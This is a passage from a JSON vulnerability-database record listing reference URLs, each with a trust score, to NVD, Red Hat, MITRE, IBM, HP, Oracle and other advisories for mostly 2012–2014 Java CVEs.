"https://nvd.nist.gov/vuln/detail/cve-2013-2444" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2450" }, { "trust": 0.8, "url": "http://www.ipa.go.jp/security/ciadr/vul/20130619-jre.html" }, { "trust": 0.8, "url": "https://www.jpcert.or.jp/at/2013/at130030.html" }, { "trust": 0.8, "url": "http://jvn.jp/cert/jvnta13-169a/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-2457" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2469" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2443" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1500" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2454" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2470" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2458" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2449" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2460" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2471" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2472" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2412.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2463.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2446.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-1500.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2455.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2456.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2459.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2444.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2407.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2447.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2452.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2470.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-1571.html" }, { "trust": 0.5, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2448.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2465.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2472.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2471.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2453.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2473.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2469.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2443.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.5, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2450.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-2457.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2461.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2445.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2454.html" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001621" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21650778" }, { "trust": 0.3, "url": "http://www.oracle.com" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas36583326fc6c02fdf86257bc60079968c" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-213-02" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?docid=emr_na-c03909126-1" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04126444" }, { "trust": 0.3, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.xg7ek.jtfhr2..t.cyta.7%2a%2ak.bw89mq%5f%5fdehufqb0" }, { "trust": 0.3, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.xg7ek.jtfhr2..t.cytc.7%2a%2ak.bw89mq%5f%5fdeoifqd0" }, { "trust": 0.3, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.xg7ek.jz8iz8..t.d3wy.82bm.bw89mq%5f%5fcviafmb0" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs13-015/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21640206" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21647053" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100173341" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1019760" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100175056" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5094215" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21644918" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21647384" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21643697" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650599" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004514" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659761" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21645500" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21648074" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas384b70812e39ffb2d86257bbf00581b8d" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas301d21b03888172bd86257bbf00581b95" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas3d553b85edf79912386257bbf00581ba9" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas3a3a4ad6297e8c3df86257bbf00581bb1" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21652561" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036927" }, { "trust": 0.3, "url": "http://www.ubuntu.com/usn/usn-1908-1/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21663487" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21663199" }, { "trust": 0.3, "url": "http://www.xerox.com/download/security/security-bulletin/12047-4e4eed8d42ca6/cert_xrx13-007_v1.0.pdf" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2451" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.3, "url": "https://access.redhat.com/knowledge/articles/11258" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2464" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2442" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2437" }, { "trust": 0.2, "url": "https://rhn.redhat.com/errata/rhsa-2013-1014.html" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2443" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2452" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2412" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2447" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1571" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2449" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2465" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2472" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2456" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2458" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2445" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2455" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2446" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2407" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2460" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1500" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2470" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2459" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2444" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2463" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2453" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2448" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2454" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2450" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2469" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2473" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2461" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2471" }, { "trust": 0.2, "url": "http://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.10/news" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2460.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2449.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2458.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2468.html" }, { "trust": 0.2, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2468" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2466" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2451.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-3743.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2464.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2466.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2437.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2442.html" }, { "trust": 0.2, "url": "https://rhn.redhat.com/errata/rhba-2013-0959.html" }, { "trust": 0.2, "url": "https://rhn.redhat.com/errata/rhsa-2013-0957.html" }, { "trust": 0.2, "url": "http://www.hp.com/java" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "https://www.hp.com/go/swa" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/1907-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=29704" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2451" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2013-0958.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0451.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0449.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5896.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5817.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0452.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5797.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2428.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0428.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0414.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5910.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0446.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5782.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5802.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5803.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5832.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5778.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5823.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5899.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5783.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0457.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5801.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5780.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2420.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2409.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-6629.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0416.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0453.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-6954.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5818.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5824.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5789.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0403.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5850.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5812.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5842.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5902.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5849.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0368.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5889.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0415.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2403.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0375.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5831.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5878.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5776.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0376.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5848.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0410.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5852.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5840.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2427.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-3829.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5907.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5772.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0373.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0458.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0411.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0460.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5905.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0424.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5819.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2412.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2398.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5820.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5809.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5898.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2421.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5884.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5825.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5774.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0461.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5830.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2414.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5784.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5887.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-4002.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0418.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5906.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0387.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-1876.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2401.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0456.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5790.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5787.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5804.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5843.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5888.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5814.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0429.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5829.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1540.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1476.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3342" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0428.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1480.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2419.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4823" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0401.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0425.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5089.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1722.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5079.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0419.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1721.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5081.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0409.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5071.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1532.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3216.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5069.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3143" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1541" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5084.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0443.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0809.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1487.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0351.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1533" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-4820.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0427.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1569.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0433.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1493.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5073.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-4823.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2435.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5068.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4822" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0547" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1541.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5068" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-4822.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3159.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1557.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1725" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1532" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5075.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2429.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3213" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5069" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0551" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1713.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3213.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0441.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5072.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1718.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0432.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0446.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4820" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1481.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1537.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1717.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1531.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2432.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0450.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1491.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2383.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1717" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2418.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1473.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0547.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1563.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1722" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2424.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1716" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2433.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1716.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5083.html" }, { "trust": 